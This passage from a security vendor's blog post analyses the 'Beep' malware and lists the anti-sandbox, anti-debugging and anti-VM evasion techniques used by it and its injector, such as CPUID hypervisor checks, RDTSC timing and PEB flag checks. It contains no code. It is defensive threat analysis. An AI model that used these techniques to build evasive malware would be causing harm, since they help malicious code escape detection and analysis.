  • Beep API function anti-sandbox. It’s the same function after which the malware is named. An alternative to the Sleep API function, which generates a beep on the PC speaker, delaying malware execution (warning wait) to avoid sandbox detection.
  • Dynamic string deobfuscation. This method means the code strings are kept obfuscated for the whole time, and the confusion layer is removed only for those strings that are going to be used at the moment. Deobfuscation is done using xor/sub/add/not assembly functions.
  • System Language check. A pretty typical IP location checkup that is often met in malware developed in ex-USSR countries, particularly Russia and Ukraine. It is performed to avoid infecting machines from these locations – such distorted ethics. If either Russian, Ukrainian, Belarusian, Tajik, Slovenian, Georgian, Kazakh, or Uzbek (Cyrillic alphabet) are detected in the system, Beep will cease any further execution.
  • NtGlobalFlag field checkup for anti-debugging. In this case, malware seeks for the offset of NtGlobalFlag. If it matches with the one that is typical for the system with a debugger enabled – the Beep ceases execution.
  • Own implementation of IsDebuggerPresent API function. Beep malware developers implemented the ASM variant of the C++ call, which checks if the process that calls for this function is debugged by a user-mode debugger.
  • Stack Segment Register checkup. The fact that the Beep is written in Assembly allows it to communicate directly with the processor. It uses information from the stack segment register of the CPU to see if there are any calls typically used for debug purposes.
  • Read Time Stamp Counter (RDTSC) instruction check. Malware checks the number of CPU ticks since the last reset to determine if it runs on a virtual machine. Machines with freshly-installed OS may be the source of false positives though.
  • CPUID anti-vm. Using CPUID function, malware А obtains the Hypervisor Brand string, which contains information about virtualization software vendors. Names like VMWare, Oracle, Parallels, Citrix or others will trigger self-destruction procedures.
  • VBOX registry key anti-vm. It’s one of the least complicated checks that aims at displaying if there are any VM-specific registry keys present in the system. Detecting the one causes malware to self-destruct.

The injector component implements the following evasion methods:

  • INT 3 and INT 2D anti-debugging. Generates an exception that will make the debuggers stop working. The former literally sets a breakpoint in the debugger execution; INT 2D instruction allows the malware to change execution flow when it detects a debugger presence.
  • CheckRemoteDebuggerPresent() API anti-debugging. Is a kernel32.dll function that sets (-1)0xffffffffff in the DebuggerPresent parameter if a debugger is present. Internally it also uses NtQueryInformationProcess with ProcessDebugPort as the ProcessInformationClass parameter.
  • IsDebuggerPresent() API anti-debugging. The easiest method to protect against debugging that determines whether custom modes debuggers, such as OllyDbg or x64dbg, debug the current process. Typically, the function only checks the “BeingDebugged” flag of the Process Environment Block (PEB).
  • ProcessDebugPort anti-debugging. Allows the malware to retrieve the debugger port number for a process using ntdll!NtQueryInformationProcess(). There is a documented ProcessDebugPort class that retrieves a DWORD value of 0xFFFFFFFFFF (decimal number -1 ) if the process is debugging.
  • VirtualAlloc()/GetWriteWatch() anti-debugging. It is a low-level Windows API providing many options. For example, GetWriteWatch allows you to get the addresses of the pages that have been written to since the region was allocated or the write tracking state was reset. In addition, this function can track debuggers that may modify memory pages outside of the expected pattern.
  • OutputDebugString() anti-debugging. Debugger detection method based on the result of a callback. An obsolete method because it only works for Windows versions before Vista. If no debugger is present and kernel32!OutputDebugString is called, and an error occurs.
  • QueryPerformanceCounter() and GetTickCount64() anti-debugging. This method retrieves the current performance counter value, which is a high-resolution time stamp (<1µs) that can be used to measure time intervals. Thus measures the delay between instructions and execution to determine if the system is running a debugger.

How dangerous is the Beep malware?

The authors of Beep malware primarily focus on evading detection, which makes it difficult for security software and researchers to detect and analyze. On the other hand, it has shown minimal and incomplete functionality for its direct purpose, i.e., stealing data and executing commands. Still, nothing stops the hackers from expanding malicious functionality. And even if this particular malware is more about being a technology demonstrator sample, it is expected to see these evasion techniques in other, more common malware samples.

The post New stealthy “Beep” malware focuses heavily on evading detection appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/beep-malware-detection-evasion/feed/ 0 13566